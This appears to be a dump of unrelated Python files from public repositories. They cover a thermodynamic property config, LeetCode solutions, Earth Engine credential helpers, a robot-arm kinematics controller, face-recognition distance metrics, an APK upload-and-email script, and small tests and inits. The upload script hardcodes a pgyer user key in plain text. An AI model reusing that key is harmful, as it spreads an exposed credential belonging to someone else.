'A': (2.8087192E1, pyunits.J/pyunits.mol/pyunits.K), # [3]
'B': (-3.678E-6, pyunits.J/pyunits.mol/pyunits.K**2),
'C': (1.745E-5, pyunits.J/pyunits.mol/pyunits.K**3),
'D': (-1.064E-8, pyunits.J/pyunits.mol/pyunits.K**4)},
"enth_mol_form_vap_comp_ref": (
0.0, pyunits.J/pyunits.mol), # [2]
"entr_mol_form_vap_comp_ref": (
205.152, pyunits.J/pyunits.mol/pyunits.K), # [2]
"pressure_sat_comp_coeff": {
'A': (15.4075, None), # [3]
'B': (734.55, pyunits.K),
'C': (-6.45, pyunits.K)}}}},
# Specifying phases
"phases": {"Liq": {"type": LiquidPhase,
"equation_of_state": Cubic,
"equation_of_state_options": {
"type": CubicType.PR}},
"Vap": {"type": VaporPhase,
"equation_of_state": Cubic,
"equation_of_state_options": {
"type": CubicType.PR}}},
# Set base units of measurement
"base_units": {"time": pyunits.s,
"length": pyunits.m,
"mass": pyunits.kg,
"amount": pyunits.mol,
"temperature": pyunits.K},
# Specifying state definition
"state_definition": FTPx,
"state_bounds": {"flow_mol": (0, 100, 1000, pyunits.mol/pyunits.s),
"temperature": (10, 300, 350, pyunits.K),
"pressure": (5e4, 1e5, 1e7, pyunits.Pa)},
"pressure_ref": (101325, pyunits.Pa),
"temperature_ref": (298.15, pyunits.K),
# Defining phase equilibria
"phases_in_equilibrium": [("Vap", "Liq")],
"phase_equilibrium_state": {("Vap", "Liq"): SmoothVLE},
"bubble_dew_method": LogBubbleDew,
"parameter_data": {"PR_kappa": {("nitrogen", "nitrogen"): 0.000,
("nitrogen", "argon"): -0.26e-2,
("nitrogen", "oxygen"): -0.119e-1,
("argon", "nitrogen"): -0.26e-2,
("argon", "argon"): 0.000,
("argon", "oxygen"): 0.104e-1,
("oxygen", "nitrogen"): -0.119e-1,
("oxygen", "argon"): 0.104e-1,
("oxygen", "oxygen"): 0.000}}}
|
Python/longest-valid-parentheses.py | shreyventure/LeetCode-Solutions | 388 | 8914 | '''
Speed: 95.97%
Memory: 24.96%
Time complexity: O(n)
Space complexity: O(n)
'''
class Solution(object):
def longestValidParentheses(self, s):
ans=0
stack=[-1]
for i in range(len(s)):
if(s[i]=='('):
stack.append(i)
else:
stack.pop()
if(len(stack)==0):
stack.append(i)
else:
ans=max(ans,i-stack[-1])
return ans |
distdeepq/__init__.py | Silvicek/distributional-dqn | 131 | 8957 | from distdeepq import models # noqa
from distdeepq.build_graph import build_act, build_train # noqa
from distdeepq.simple import learn, load, make_session # noqa
from distdeepq.replay_buffer import ReplayBuffer, PrioritizedReplayBuffer # noqa
from distdeepq.static import *
from distdeepq.plots import PlotMachine
|
LeetCode/python3/287.py | ZintrulCre/LeetCode_Archiver | 279 | 9012 | class Solution:
def findDuplicate(self, nums: List[int]) -> int:
p1, p2 = nums[0], nums[nums[0]]
while nums[p1] != nums[p2]:
p1 = nums[p1]
p2 = nums[nums[p2]]
p2 = 0
while nums[p1] != nums[p2]:
p1 = nums[p1]
p2 = nums[p2]
return nums[p1]
|
src/twisted/test/myrebuilder1.py | mathieui/twisted | 9,953 | 9013 | <reponame>mathieui/twisted<filename>src/twisted/test/myrebuilder1.py
class A:
def a(self):
return 'a'
class B(A, object):
def b(self):
return 'b'
class Inherit(A):
def a(self):
return 'c'
|
modules/google-earth-engine/docker/src/sepalinternal/gee.py | BuddyVolly/sepal | 153 | 9015 | import json
from threading import Semaphore
import ee
from flask import request
from google.auth import crypt
from google.oauth2 import service_account
from google.oauth2.credentials import Credentials
service_account_credentials = None
import logging
export_semaphore = Semaphore(5)
get_info_semaphore = Semaphore(2)
def init_service_account_credentials(args):
global service_account_credentials
with open(args['gee_key_path'], 'r') as file_:
key_data = file_.read()
signer = crypt.RSASigner.from_string(key_data)
service_account_credentials = service_account.Credentials(
signer=signer,
service_account_email=args['gee_email'],
token_uri=ee.oauth.TOKEN_URI,
scopes=ee.oauth.SCOPES + ['https://www.googleapis.com/auth/drive']
)
def init_ee():
credentials = service_account_credentials
if 'sepal-user' in request.headers:
user = json.loads(request.headers['sepal-user'])
googleTokens = user.get('googleTokens', None)
if googleTokens:
credentials = Credentials(googleTokens['accessToken'])
ee.InitializeThread(credentials)
def to_asset_id(asset_path):
asset_roots = ee.data.getAssetRoots()
if not asset_roots:
raise Exception('User has no GEE asset roots')
return asset_roots[0]['id'] + '/' + asset_path
def delete_asset_collection(asset_id):
logging.info('Recursively deleting ' + asset_id)
if ee.data.getInfo(asset_id):
images = ee.data.getList({
'id': asset_id,
'fields': 'id'
})
for image in images:
ee.data.deleteAsset(image['id'])
logging.info('Deleted ' + image['id'])
ee.data.deleteAsset(asset_id)
logging.info('Deleted ' + asset_id)
def create_asset_image_collection(asset_id):
delete_asset_collection(asset_id)
ee.data.create_assets(
asset_ids=[asset_id],
asset_type=ee.data.ASSET_TYPE_IMAGE_COLL,
mk_parents=True
)
def create_asset_folder(asset_id):
ee.data.create_assets(
asset_ids=[asset_id],
asset_type=ee.data.ASSET_TYPE_FOLDER,
mk_parents=True
)
def get_info(ee_object):
try:
get_info_semaphore.acquire()
return ee_object.getInfo()
finally:
get_info_semaphore.release()
|
PyIK/src/litearm.py | AliShug/EvoArm | 110 | 9018 | <reponame>AliShug/EvoArm
from __future__ import print_function
import numpy as np
import struct
import solvers
import pid
from util import *
MOTORSPEED = 0.9
MOTORMARGIN = 1
MOTORSLOPE = 30
ERRORLIM = 5.0
class ArmConfig:
"""Holds an arm's proportions, limits and other configuration data"""
def __init__(self,
main_length = 148.4,
forearm_length = 160,
linkage_length = 155,
lower_actuator_length = 65,
upper_actuator_length = 54.4,
wrist_length = 90.52,
shoulder_offset = [-9.7, 18.71]):
self.main_length = main_length
self.forearm_length = forearm_length
self.linkage_length = linkage_length
self.lower_actuator_length = lower_actuator_length
self.upper_actuator_length = upper_actuator_length
self.wrist_length = wrist_length;
self.shoulder_offset = shoulder_offset
class ArmPose:
"""
Defines a physical configuration of a LiteArm robot arm.
Internal angles are relative to vertical (elevator/actuator) or straight
forward (swing), and are stored in radians. Extracted servo angles range
0-300 and are measured in degrees.
Provides methods for:
- finding the required servo angles to reach the pose
- checking the validity of the pose
"""
structFormat = 'fffff'
@staticmethod
def calcElevatorAngle(servoAngle):
return radians(178.21 - servoAngle)
@staticmethod
def calcSwingAngle(servoAngle):
return radians(150.0 - servoAngle)
@staticmethod
def calcActuatorAngle(servoAngle):
return radians(servoAngle - 204.78)
@staticmethod
def calcWristXAngle(servoAngle):
return radians(150.0 - servoAngle)
@staticmethod
def calcWristYAngle(servoAngle):
return radians(servoAngle - 147.0)
def __init__(self,
arm_config,
swing_angle,
shoulder_angle,
actuator_angle,
elbow_angle,
elbow2D,
wrist2D,
effector2D,
effector,
wrist_x,
wrist_y):
self.cfg = arm_config
self.swing_angle = swing_angle
self.shoulder_angle = shoulder_angle
self.actuator_angle = actuator_angle
self.elbow_angle = elbow_angle
# Joints in the arm
shoulder = rotate(self.cfg.shoulder_offset, swing_angle)
self.shoulder2D = [self.cfg.shoulder_offset[1], 0]
self.shoulder = [shoulder[0], 0, shoulder[1]]
self.wrist2D = wrist2D
self.effector2D = effector2D
self.effector = effector
# Construct the 3D elbow & wrist positions from the 2D (planar) IK
# solution
arm_vec = effector - self.shoulder
arm_vec[1] = 0
self.elbow2D = elbow2D
self.elbow = self.shoulder + normalize(arm_vec)*elbow2D[0]
self.elbow[1] = elbow2D[1]
self.wrist = self.effector - normalize(arm_vec)*arm_config.wrist_length
# Wrist pose
self.wristXAngle = wrist_x
self.wristYAngle = wrist_y
def getServoElevator(self):
return 178.21 - degrees(self.shoulder_angle)
def getServoActuator(self):
return degrees(self.actuator_angle) + 204.78
def getServoSwing(self):
return 150 - degrees(self.swing_angle)
def getServoWristX(self):
return 150 - degrees(self.wristXAngle)
def getServoWristY(self):
return 147 + degrees(self.wristYAngle)
def armDiffAngle(self):
return degrees(self.shoulder_angle - self.actuator_angle)
def checkActuator(self):
angle = self.getServoActuator()
return angle >= 95 and angle <= 250
def checkDiff(self):
angle = self.armDiffAngle()
return angle >= 44 and angle <= 175
def checkElevator(self):
angle = self.getServoElevator()
return angle >= 60 and angle <= 210
def checkForearm(self):
angle = degrees(self.elbow_angle + self.shoulder_angle)
return angle < 200 and angle > 80
def checkSwing(self):
angle = self.getServoSwing()
return angle >= 60 and angle <= 240
def checkWristX(self):
angle = self.getServoWristX()
return angle >= 60 and angle <= 240
def checkWristY(self):
angle = self.getServoWristY()
return angle >= 60 and angle <= 160
def checkPositioning(self):
# When Y>0 Forearm always faces outwards
if self.wrist2D[1] > 0 and self.wrist2D[0] < self.elbow2D[0]:
return False
# No valid positions X<=0
if self.wrist2D[0] <= 0:
return False
# Effector height range
if self.effector[1] > 180 or self.effector[1] < -200:
return False
return True
def checkClearance(self):
return (self.checkDiff() and self.checkActuator() and
self.checkElevator() and self.checkSwing() and
self.checkWristX() and self.checkWristY() and
self.checkPositioning() and self.checkForearm())
def serialize(self):
"""Returns a packed struct holding the pose information"""
return struct.pack(
ArmPose.structFormat,
self.swing_angle,
self.shoulder_angle,
self.elbow_angle,
self.wristXAngle,
self.wristYAngle
)
class ArmController:
def __init__(self,
servo_swing,
servo_shoulder,
servo_elbow,
servo_wrist_x,
servo_wrist_y,
arm_config,
motion_enable = False):
# Solvers are responsible for calculating the target servo positions to
# reach a given goal position
self.ik = solvers.IKSolver(
arm_config.main_length,
arm_config.forearm_length,
arm_config.wrist_length,
arm_config.shoulder_offset)
self.physsolver = solvers.PhysicalSolver(
arm_config.main_length,
arm_config.linkage_length,
arm_config.lower_actuator_length,
arm_config.upper_actuator_length)
# Servos
self.servos = {}
self.servos["swing"] = servo_swing
self.servos["shoulder"] = servo_shoulder
self.servos["elbow"] = servo_elbow
self.servos["wrist_x"] = servo_wrist_x
self.servos["wrist_y"] = servo_wrist_y
for key, servo in self.servos.iteritems():
if servo is None:
print ("Warning: {0} servo not connected".format(key))
else:
# Initialise a PID controller for the servo
if servo.protocol == 1:
servo.setGoalSpeed(-MOTORSPEED)
servo.data['pid'] = pid.PIDControl(2.4, 0, 0.4)
else:
servo.setGoalSpeed(0)
servo.data['error'] = 0.0
# Make sure the goal speed is set
servo.setTorqueEnable(1)
if servo.protocol == 1:
print("Setting slope")
servo.setCWMargin(MOTORMARGIN)
servo.setCCWMargin(MOTORMARGIN)
servo.setCWSlope(MOTORSLOPE)
servo.setCCWSlope(MOTORSLOPE)
# Store parameters
self.motion_enable = True
self.enableMovement(False)
self.cfg = arm_config
# Dirty flags for stored poses
self.ik_pose = None
self.ik_dirty = True
self.real_pose = None
self.real_dirty = True
# Current target pose
self.target_pose = None
def enableMovement(self, enable):
changed = False
if enable and not self.motion_enable:
print ("Warning: Arm enabled")
self.motion_enable = True
changed = True
elif not enable:
self.motion_enable = False
changed = True
if changed:
# Set servos on/off
if self.servos['swing'] is not None:
self.servos['swing'].setTorqueEnable(self.motion_enable)
if self.servos['shoulder'] is not None:
self.servos['shoulder'].setTorqueEnable(self.motion_enable)
if self.servos['elbow'] is not None:
self.servos['elbow'].setTorqueEnable(self.motion_enable)
if self.servos['wrist_x'] is not None:
self.servos['wrist_x'].setTorqueEnable(self.motion_enable)
if self.servos['wrist_y'] is not None:
self.servos['wrist_y'].setTorqueEnable(self.motion_enable)
def setWristGoalPosition(self, pos):
self.ik.setGoal(pos)
self.ik_dirty = True
def setWristGoalDirection(self, normal):
self.ik.setWristDir(normal)
self.ik_dirty = True
def getIKPose(self):
if self.ik_dirty and self.ik.valid:
# Construct geometry of arm from IK state
main_arm = self.ik.elbow - self.ik.originpl
arm_vert_angle = sigangle(main_arm, vertical)
forearm = self.ik.wristpl - self.ik.elbow
elbow_angle = angle_between(main_arm, forearm)
# Solve actuator angle for given elbow angle
# Base angle is between the main arm and actuator
base_angle = self.physsolver.inverse_forearm(elbow_angle)
actuator_angle = arm_vert_angle - base_angle
self.ik_pose = ArmPose(
self.cfg,
swing_angle = self.ik.swing,
# angles from vertical
shoulder_angle = arm_vert_angle,
actuator_angle = actuator_angle,
# angle between the main arm and forearm
elbow_angle = elbow_angle,
elbow2D = self.ik.elbow,
wrist2D = self.ik.wristpl,
effector2D = self.ik.goalpl,
effector = self.ik.goal,
wrist_x = self.ik.wrist_x,
wrist_y = self.ik.wrist_y
)
return self.ik_pose
def pollServos(self):
"""Poll the real-world servo positions"""
for servo in self.servos.itervalues():
if servo is not None:
newPos = servo.getPosition()
if type(newPos) is float:
servo.data['pos'] = newPos
def clearPositionError(self):
"""Clears the servo's position-error accumulators"""
for servo in self.servos.itervalues():
if servo is not None and servo.protocol == 1:
servo.data['error'] = 0.0
def getRealPose(self):
"""Retrieve the real-world arm pose, or None if not all servos are
connected.
"""
if any([servo is None for servo in self.servos.itervalues()]):
return None
# This whole function is essentially just FK based on the known servo
# angles
swing_servo = self.servos['swing'].data['pos']
elevator_servo = self.servos['shoulder'].data['pos']
actuator_servo = self.servos['elbow'].data['pos']
wrist_x_servo = self.servos['wrist_x'].data['pos']
wrist_y_servo = self.servos['wrist_y'].data['pos']
# Find the internal arm-pose angles for the given servo positions
swing_angle = ArmPose.calcSwingAngle(swing_servo)
elevator_angle = ArmPose.calcElevatorAngle(elevator_servo)
actuator_angle = ArmPose.calcActuatorAngle(actuator_servo)
wrist_x_angle = ArmPose.calcWristXAngle(wrist_x_servo)
wrist_y_angle = ArmPose.calcWristYAngle(wrist_y_servo)
# Solve elbow angle for given actuator and elevator angles
# (this is the angle from the elevator arm's direction to the forearm's)
elbow_angle = self.physsolver.solve_forearm(elevator_angle, actuator_angle)
# FK positions from config and angles
offset = self.cfg.shoulder_offset
shoulder2D = np.array([offset[1], 0])
elbow2D = shoulder2D + rotate(vertical, elevator_angle)*self.cfg.main_length
wrist2D = elbow2D + rotate(vertical, elevator_angle + elbow_angle)*self.cfg.forearm_length
effector2D = wrist2D + [self.cfg.wrist_length, 0]
# 3D Effector calculation is a little more involved
td = rotate([offset[0], effector2D[0]], swing_angle)
effector = np.array([td[0], effector2D[1], td[1]])
pose = ArmPose(
self.cfg,
swing_angle, elevator_angle, actuator_angle,
elbow_angle, elbow2D, wrist2D, effector2D,
effector, wrist_x_angle, wrist_y_angle)
return pose
def setTargetPose(self, new_pose):
self.target_pose = new_pose
def tick(self):
if self.target_pose is not None:
if self.motion_enable:
# Drive servos
gain = 0.1
if self.servos['swing'] is not None:
s = self.servos['swing']
pos = s.data['pos']
target = self.target_pose.getServoSwing()
# err = min(10, pos-target)
# s.data['error'] += err*gain
s.setGoalPosition(target)
if self.servos['shoulder'] is not None:
s = self.servos['shoulder']
# cumulative error
pos = s.data['pos']
target = self.target_pose.getServoElevator()
err = min(10, pos-target)
s.data['error'] += err*gain
s.data['error'] = np.clip(s.data['error'], -ERRORLIM, ERRORLIM)
s.setGoalPosition(target - s.data['error'])
if self.servos['elbow'] is not None:
s = self.servos['elbow']
pos = s.data['pos']
target = self.target_pose.getServoActuator()
err = min(10, pos-target)
s.data['error'] += err*gain
s.data['error'] = np.clip(s.data['error'], -ERRORLIM, ERRORLIM)
s.setGoalPosition(target - s.data['error'])
if self.servos['wrist_x'] is not None:
self.servos['wrist_x'].setGoalPosition(self.target_pose.getServoWristX())
if self.servos['wrist_y'] is not None:
self.servos['wrist_y'].setGoalPosition(self.target_pose.getServoWristY())
|
facerec-master/py/facerec/distance.py | ArianeFire/HaniCam | 776 | 9029 | <reponame>ArianeFire/HaniCam<filename>facerec-master/py/facerec/distance.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) <NAME>. All rights reserved.
# Licensed under the BSD license. See LICENSE file in the project root for full license information.
import numpy as np
class AbstractDistance(object):
def __init__(self, name):
self._name = name
def __call__(self,p,q):
raise NotImplementedError("Every AbstractDistance must implement the __call__ method.")
@property
def name(self):
return self._name
def __repr__(self):
return self._name
class EuclideanDistance(AbstractDistance):
def __init__(self):
AbstractDistance.__init__(self,"EuclideanDistance")
def __call__(self, p, q):
p = np.asarray(p).flatten()
q = np.asarray(q).flatten()
return np.sqrt(np.sum(np.power((p-q),2)))
class CosineDistance(AbstractDistance):
"""
Negated Mahalanobis Cosine Distance.
Literature:
"Studies on sensitivity of face recognition performance to eye location accuracy.". Master Thesis (2004), Wang
"""
def __init__(self):
AbstractDistance.__init__(self,"CosineDistance")
def __call__(self, p, q):
p = np.asarray(p).flatten()
q = np.asarray(q).flatten()
return -np.dot(p.T,q) / (np.sqrt(np.dot(p,p.T)*np.dot(q,q.T)))
class NormalizedCorrelation(AbstractDistance):
"""
Calculates the NormalizedCorrelation Coefficient for two vectors.
Literature:
"Multi-scale Local Binary Pattern Histogram for Face Recognition". PhD (2008). Chi Ho Chan, University Of Surrey.
"""
def __init__(self):
AbstractDistance.__init__(self,"NormalizedCorrelation")
def __call__(self, p, q):
p = np.asarray(p).flatten()
q = np.asarray(q).flatten()
pmu = p.mean()
qmu = q.mean()
pm = p - pmu
qm = q - qmu
return 1.0 - (np.dot(pm, qm) / (np.sqrt(np.dot(pm, pm)) * np.sqrt(np.dot(qm, qm))))
class ChiSquareDistance(AbstractDistance):
"""
Negated Mahalanobis Cosine Distance.
Literature:
"Studies on sensitivity of face recognition performance to eye location accuracy.". Master Thesis (2004), Wang
"""
def __init__(self):
AbstractDistance.__init__(self,"ChiSquareDistance")
def __call__(self, p, q):
p = np.asarray(p).flatten()
q = np.asarray(q).flatten()
bin_dists = (p-q)**2 / (p+q+np.finfo('float').eps)
return np.sum(bin_dists)
class HistogramIntersection(AbstractDistance):
def __init__(self):
AbstractDistance.__init__(self,"HistogramIntersection")
def __call__(self, p, q):
p = np.asarray(p).flatten()
q = np.asarray(q).flatten()
return np.sum(np.minimum(p,q))
class BinRatioDistance(AbstractDistance):
"""
Calculates the Bin Ratio Dissimilarity.
Literature:
"Use Bin-Ratio Information for Category and Scene Classification" (2010), Xie et.al.
"""
def __init__(self):
AbstractDistance.__init__(self,"BinRatioDistance")
def __call__(self, p, q):
p = np.asarray(p).flatten()
q = np.asarray(q).flatten()
a = np.abs(1-np.dot(p,q.T)) # NumPy needs np.dot instead of * for reducing to tensor
b = ((p-q)**2 + 2*a*(p*q))/((p+q)**2+np.finfo('float').eps)
return np.abs(np.sum(b))
class L1BinRatioDistance(AbstractDistance):
"""
Calculates the L1-Bin Ratio Dissimilarity.
Literature:
"Use Bin-Ratio Information for Category and Scene Classification" (2010), Xie et.al.
"""
def __init__(self):
AbstractDistance.__init__(self,"L1-BinRatioDistance")
def __call__(self, p, q):
p = np.asarray(p, dtype=np.float).flatten()
q = np.asarray(q, dtype=np.float).flatten()
a = np.abs(1-np.dot(p,q.T)) # NumPy needs np.dot instead of * for reducing to tensor
b = ((p-q)**2 + 2*a*(p*q)) * abs(p-q) / ((p+q)**2+np.finfo('float').eps)
return np.abs(np.sum(b))
class ChiSquareBRD(AbstractDistance):
"""
Calculates the ChiSquare-Bin Ratio Dissimilarity.
Literature:
"Use Bin-Ratio Information for Category and Scene Classification" (2010), Xie et.al.
"""
def __init__(self):
AbstractDistance.__init__(self,"ChiSquare-BinRatioDistance")
def __call__(self, p, q):
p = np.asarray(p, dtype=np.float).flatten()
q = np.asarray(q, dtype=np.float).flatten()
a = np.abs(1-np.dot(p,q.T)) # NumPy needs np.dot instead of * for reducing to tensor
b = ((p-q)**2 + 2*a*(p*q)) * (p-q)**2 / ((p+q)**3+np.finfo('float').eps)
return np.abs(np.sum(b))
|
pgyer_uploader.py | elina8013/android_demo | 666 | 9030 | <filename>pgyer_uploader.py
#!/usr/bin/python
#coding=utf-8
import os
import requests
import time
import re
from datetime import datetime
import urllib2
import json
import mimetypes
import smtplib
from email.MIMEText import MIMEText
from email.MIMEMultipart import MIMEMultipart
# configuration for pgyer
USER_KEY = "f605b7c7826690f796078e3dd23a60d5"
API_KEY = "<KEY>"
PGYER_UPLOAD_URL = "https://www.pgyer.com/apiv1/app/upload"
repo_path = 'C:/Users/Administrator/.jenkins/workspace/Demo/app'
repo_url = 'https://github.com/r17171709/iite_test'
ipa_path = "C:/Users/Administrator/.jenkins/workspace/Demo/app/build/outputs/apk/app-release.apk"
update_description = "版本更新测试"
def parseUploadResult(jsonResult):
print 'post response: %s' % jsonResult
resultCode = jsonResult['code']
send_Email(jsonResult)
if resultCode != 0:
print "Upload Fail!"
raise Exception("Reason: %s" % jsonResult['message'])
print "Upload Success"
appKey = jsonResult['data']['appKey']
appDownloadPageURL = "https://www.pgyer.com/%s" % appKey
print "appDownloadPage: %s" % appDownloadPageURL
return appDownloadPageURL
def uploadIpaToPgyer(ipaPath, updateDescription):
print "Begin to upload ipa to Pgyer: %s" % ipaPath
headers = {'enctype': 'multipart/form-data'}
payload = {
'uKey': USER_KEY,
'_api_key': API_KEY,
'publishRange': '2', # 直接发布
'isPublishToPublic': '2', # 不发布到广场
'updateDescription': updateDescription # 版本更新描述
}
try_times = 0
while try_times < 5:
try:
print "uploading ... %s" % datetime.now()
ipa_file = {'file': open(ipaPath, 'rb')}
r = requests.post(PGYER_UPLOAD_URL,
headers = headers,
files = ipa_file,
data = payload
)
assert r.status_code == requests.codes.ok
result = r.json()
appDownloadPageURL = parseUploadResult(result)
return appDownloadPageURL
except requests.exceptions.ConnectionError:
print "requests.exceptions.ConnectionError occured!"
time.sleep(60)
print "try again ... %s" % datetime.now()
try_times += 1
except Exception as e:
print "Exception occured: %s" % str(e)
time.sleep(60)
print "try again ... %s" % datetime.now()
try_times += 1
if try_times >= 5:
raise Exception("Failed to upload ipa to Pgyer, retried 5 times.")
def parseQRCodeImageUrl(appDownloadPageURL):
try_times = 0
while try_times < 3:
try:
response = requests.get(appDownloadPageURL)
regex = '<img src=\"(.*?)\" style='
m = re.search(regex, response.content)
assert m is not None
appQRCodeURL = m.group(1)
print "appQRCodeURL: %s" % appQRCodeURL
return appQRCodeURL
except AssertionError:
try_times += 1
time.sleep(60)
print "Can not locate QRCode image. retry ... %s: %s" % (try_times, datetime.now())
if try_times >= 3:
raise Exception("Failed to locate QRCode image in download page, retried 3 times.")
def saveQRCodeImage(appDownloadPageURL, output_folder):
appQRCodeURL = parseQRCodeImageUrl(appDownloadPageURL)
response = requests.get(appQRCodeURL)
qr_image_file_path = os.path.join(output_folder, 'QRCode.png')
if response.status_code == 200:
with open(qr_image_file_path, 'wb') as f:
f.write(response.content)
print 'Save QRCode image to file: %s' % qr_image_file_path
def main():
appDownloadPageURL = uploadIpaToPgyer(ipa_path, update_description)
try:
output_folder = os.path.dirname(ipa_path)
saveQRCodeImage(appDownloadPageURL, output_folder)
except Exception as e:
print "Exception occured: %s" % str(e)
#获取 最后一次 提交git的信息
def getCommitInfo():
#方法一 使用 python 库 前提是 当前分支 在服务器上存在
# repo = Gittle(repo_path, origin_uri=repo_url)
# commitInfo = repo.commit_info(start=0, end=1)
# lastCommitInfo = commitInfo[0]
#方法二 直接 cd 到 目录下 git log -1 打印commit 信息
os.chdir(repo_path);
lastCommitInfo = run_cmd('git log -1')
return lastCommitInfo
#发送邮件
def send_Email(json_result):
print '*******start to send mail****'
appName = json_result['data']['appName']
appKey = json_result['data']['appKey']
appVersion = json_result['data']['appVersion']
appBuildVersion = json_result['data']['appBuildVersion']
appShortcutUrl = json_result['data']['appShortcutUrl']
#邮件接受者
mail_receiver = ['<EMAIL>']
#根据不同邮箱配置 host,user,和pwd
mail_host = 'smtp.139.com'
mail_port = 465
mail_user = '<EMAIL>'
mail_pwd = '<PASSWORD>'
mail_to = ','.join(mail_receiver)
msg = MIMEMultipart()
environsString = '<p><h3>本次打包相关信息</h3><p>'
# environsString += '<p>ipa 包下载地址 : ' + 'wudizhi' + '<p>'
environsString += '<p>蒲公英安装地址 : ' + 'http://www.pgyer.com/' + str(appShortcutUrl) + '<p><p><p><p>'
# environsString += '<li><a href="itms-services://?action=download-manifest&url=https://ssl.pgyer.com/app/plist/' + str(appKey) + '"></a>点击直接安装</li>'
environsString += '<p><h3>本次git提交相关信息</h3><p>'
#获取git最后一次提交信息
lastCommitInfo = getCommitInfo()
# #提交人
# committer = lastCommitInfo['committer']['raw']
# #提交信息
# description = lastCommitInfo['description']
environsString += '<p>' + '<font color="red">' + lastCommitInfo + '</font>' + '<p>'
# environsString += '<p>Description:' + '<font color="red">' + description + '</font>' + '<p>'
message = environsString
body = MIMEText(message, _subtype='html', _charset='utf-8')
msg["Accept-Language"]="zh-CN"
msg["Accept-Charset"]="ISO-8859-1,utf-8"
msg.attach(body)
msg['To'] = mail_to
msg['from'] = '<EMAIL>'
msg['subject'] = 'Android APP 最新打包文件'
try:
s = smtplib.SMTP()
# 设置为调试模式,就是在会话过程中会有输出信息
s.set_debuglevel(1)
s.connect(mail_host)
s.starttls() # 创建 SSL 安全加密 链接
s.login(mail_user, mail_pwd)
s.sendmail(mail_user, mail_receiver, msg.as_string())
s.close()
print '*******mail send ok****'
except Exception, e:
print e
def run_cmd(cmd):
try:
import subprocess
except ImportError:
_, result_f, error_f = os.popen3(cmd)
else:
process = subprocess.Popen(cmd, shell = True,
stdout = subprocess.PIPE, stderr = subprocess.PIPE)
result_f, error_f = process.stdout, process.stderr
errors = error_f.read()
if errors: pass
result_str = result_f.read().strip()
if result_f : result_f.close()
if error_f : error_f.close()
return result_str
if __name__ == '__main__':
main()
|
fastseg/model/utils.py | SeockHwa/Segmentation_mobileV3 | 274 | 9052 | <filename>fastseg/model/utils.py<gh_stars>100-1000
import torch.nn as nn
from .efficientnet import EfficientNet_B4, EfficientNet_B0
from .mobilenetv3 import MobileNetV3_Large, MobileNetV3_Small
def get_trunk(trunk_name):
"""Retrieve the pretrained network trunk and channel counts"""
if trunk_name == 'efficientnet_b4':
backbone = EfficientNet_B4(pretrained=True)
s2_ch = 24
s4_ch = 32
high_level_ch = 1792
elif trunk_name == 'efficientnet_b0':
backbone = EfficientNet_B0(pretrained=True)
s2_ch = 16
s4_ch = 24
high_level_ch = 1280
elif trunk_name == 'mobilenetv3_large':
backbone = MobileNetV3_Large(pretrained=True)
s2_ch = 16
s4_ch = 24
high_level_ch = 960
elif trunk_name == 'mobilenetv3_small':
backbone = MobileNetV3_Small(pretrained=True)
s2_ch = 16
s4_ch = 16
high_level_ch = 576
else:
raise ValueError('unknown backbone {}'.format(trunk_name))
return backbone, s2_ch, s4_ch, high_level_ch
class ConvBnRelu(nn.Module):
"""Convenience layer combining a Conv2d, BatchNorm2d, and a ReLU activation.
Original source of this code comes from
https://github.com/lingtengqiu/Deeperlab-pytorch/blob/master/seg_opr/seg_oprs.py
"""
def __init__(self, in_planes, out_planes, kernel_size, stride=1, padding=0,
norm_layer=nn.BatchNorm2d):
super(ConvBnRelu, self).__init__()
self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size,
stride=stride, padding=padding, bias=False)
self.bn = norm_layer(out_planes, eps=1e-5)
self.relu = nn.ReLU(inplace=True)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.relu(x)
return x
|
cmsplugin_cascade/migrations/0007_add_proxy_models.py | teklager/djangocms-cascade | 139 | 9063 | from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cmsplugin_cascade', '0006_bootstrapgallerypluginmodel'),
]
operations = [
]
|
theonionbox/tob/credits.py | ralphwetzel/theonionbox | 120 | 9064 | Credits = [
('Bootstrap', 'https://getbootstrap.com', 'The Bootstrap team', 'MIT'),
('Bottle', 'http://bottlepy.org', '<NAME>', 'MIT'),
('Cheroot', 'https://github.com/cherrypy/cheroot', 'CherryPy Team', 'BSD 3-Clause "New" or "Revised" License'),
('Click', 'https://github.com/pallets/click', 'Pallets', 'BSD 3-Clause "New" or "Revised" License'),
('ConfigUpdater', 'https://github.com/pyscaffold/configupdater', '<NAME>', 'MIT'),
('Glide', 'https://github.com/glidejs/glide', '@jedrzejchalubek', 'MIT'),
('JQuery', 'https://jquery.com', 'The jQuery Foundation', 'MIT'),
('jquery.pep.js', 'http://pep.briangonzalez.org', '@briangonzalez', 'MIT'),
('js-md5', 'https://github.com/emn178/js-md5', '@emn178', 'MIT'),
('PySocks', 'https://github.com/Anorov/PySocks', '@Anorov', 'Custom DAN HAIM'),
('RapydScript-NG', 'https://github.com/kovidgoyal/rapydscript-ng', '@kovidgoyal',
'BSD 2-Clause "Simplified" License'),
('Requests', 'https://requests.kennethreitz.org', '<NAME>', 'Apache License, Version 2.0'),
('scrollMonitor', 'https://github.com/stutrek/scrollmonitor', '@stutrek', 'MIT'),
('Smoothie Charts', 'https://github.com/joewalnes/smoothie', '@drewnoakes', 'MIT'),
('stem', 'https://stem.torproject.org', '<NAME> and The Tor Project', 'GNU LESSER GENERAL PUBLIC LICENSE')
]
|
pypeln/thread/api/to_iterable_thread_test.py | quarckster/pypeln | 1,281 | 9111 | <filename>pypeln/thread/api/to_iterable_thread_test.py
import typing as tp
from unittest import TestCase
import hypothesis as hp
from hypothesis import strategies as st
import pypeln as pl
import cytoolz as cz
MAX_EXAMPLES = 10
T = tp.TypeVar("T")
@hp.given(nums=st.lists(st.integers()))
@hp.settings(max_examples=MAX_EXAMPLES)
def test_from_to_iterable(nums: tp.List[int]):
nums_pl = nums
nums_pl = pl.thread.from_iterable(nums_pl)
nums_pl = cz.partition_all(10, nums_pl)
nums_pl = pl.thread.map(sum, nums_pl)
nums_pl = pl.thread.to_iterable(nums_pl)
nums_pl = list(nums_pl)
nums_py = nums
nums_py = cz.partition_all(10, nums_py)
nums_py = map(sum, nums_py)
nums_py = list(nums_py)
assert nums_py == nums_pl
|
pulsar/datadog_checks/pulsar/check.py | divyamamgai/integrations-extras | 158 | 9122 | <filename>pulsar/datadog_checks/pulsar/check.py
from datadog_checks.base import ConfigurationError, OpenMetricsBaseCheck
